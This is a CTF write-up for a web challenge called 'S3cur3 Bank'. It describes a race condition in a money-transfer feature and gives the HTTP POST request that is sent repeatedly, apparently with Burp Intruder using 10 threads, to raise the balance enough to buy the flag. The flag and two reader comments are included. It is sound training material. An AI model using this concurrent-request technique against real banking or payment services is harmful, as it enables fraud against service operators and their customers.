Tags: web
Rating: 5.0
# ▼▼▼S3cur3 Bank(Web:179pts:44/306solved=14.4%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
S3cur3 Bank 179
======= Difficulty level : Medium ========
It is notoriously called the most secure bank service ever. It allows us to transfer your money between 2 accounts. Can you hack the service to buy a flag???
Link(http://18.188.42.158/)
========== Authors : c3rb3ru5, SpyD3r ==========
```
---
## 【Understanding of functions】
```
・sign up/sign in
・There is a bank A B, there is a function to send money to each
・The first money is $ 2000
・The amount of flag is $ 5000
```
↓
I was able to guess that `lack of exclusive processing` vulnerability
---
## 【exploit】
Continuously send the following request to remit money
↓
```
POST /bank.php?id=b29d2ece084806d094fc1b4a2382b094 HTTP/1.1
Host: 18.188.42.158
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
transfer=100&account=Transfer+to+B
```
↓
I bought flag as money reached $ 5000
↓
`inctf{y0u_r4c3_v3ry_w3ll}`
Hi PwnaSonic, I can't solve this problem and I try to do follow your write-up. But I got "Insufficient funds" message Can you recommend something to me? Thanks
I sent BurpSuite's intruder with thread = 10.
